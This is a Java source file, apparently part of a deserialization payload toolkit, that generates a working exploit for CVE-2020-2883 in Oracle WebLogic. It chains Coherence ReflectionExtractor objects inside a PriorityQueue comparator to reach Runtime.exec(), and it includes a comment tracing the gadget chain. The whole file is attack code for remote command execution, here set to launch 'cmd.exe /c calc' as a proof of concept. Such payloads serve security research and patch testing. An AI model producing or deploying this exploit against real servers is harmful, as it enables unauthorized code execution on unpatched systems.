package payloads;

import com.tangosol.coherence.reporter.extractor.ConstantExtractor;
import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.MultiExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import common.Serializerable;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.PayloadRunner;

import java.lang.reflect.Field;
import java.util.PriorityQueue;


/*

ObjectInputStream.readObject()
    PriorityQueue.readObject()
        PriorityQueue.heapify()
            PriorityQueue.siftDown()
                siftDownUsingComparator()
                    com.tangosol.util.extractor.AbstractExtractor.compare()
                      com.tangosol.util.extractor.MultiExtractor.extract()
                        com.tangosol.util.extractor.ChainedExtractor.extract()
                            com.tangosol.util.extractor.ChainedExtractor.extract()
                                com.tangosol.util.extractor.ReflectionExtractor().extract()
                                    Method.invoke()
                                    .......
                                com.tangosol.util.extractor.ReflectionExtractor().extract()
                                    Method.invoke()
                                    Runtime.exec()
 */

// CVE-2020-2883 2

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4"})
@Authors({ Authors.FROHOFF })
public class Weblogic7 implements ObjectPayload<Object> {

	public byte[] getObject(final String command) throws Exception {
		ValueExtractor[] valueExtractors = new ValueExtractor[]{
				new ConstantExtractor(Runtime.class),
				new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
				new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}),
				new ReflectionExtractor("exec", new Object[]{new String[]{"cmd.exe", "/c", "calc"}})
		};
		ChainedExtractor chainedExtractor = new ChainedExtractor<>(valueExtractors);
		MultiExtractor multiExtractor = new MultiExtractor();

		Field m_extractor = multiExtractor.getClass().getSuperclass().getDeclaredField("m_aExtractor");
		m_extractor.setAccessible(true);
		m_extractor.set(multiExtractor, new ValueExtractor[]{chainedExtractor});

		PriorityQueue priorityQueue = new PriorityQueue();
		priorityQueue.add("foo");
		priorityQueue.add("bar");

		Field comparator = priorityQueue.getClass().getDeclaredField("comparator");
		comparator.setAccessible(true);
		comparator.set(priorityQueue, multiExtractor);

		return Serializerable.serialize(priorityQueue);
	}

	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
		return Weblogic7.class.newInstance().getObject(command);
	}
}
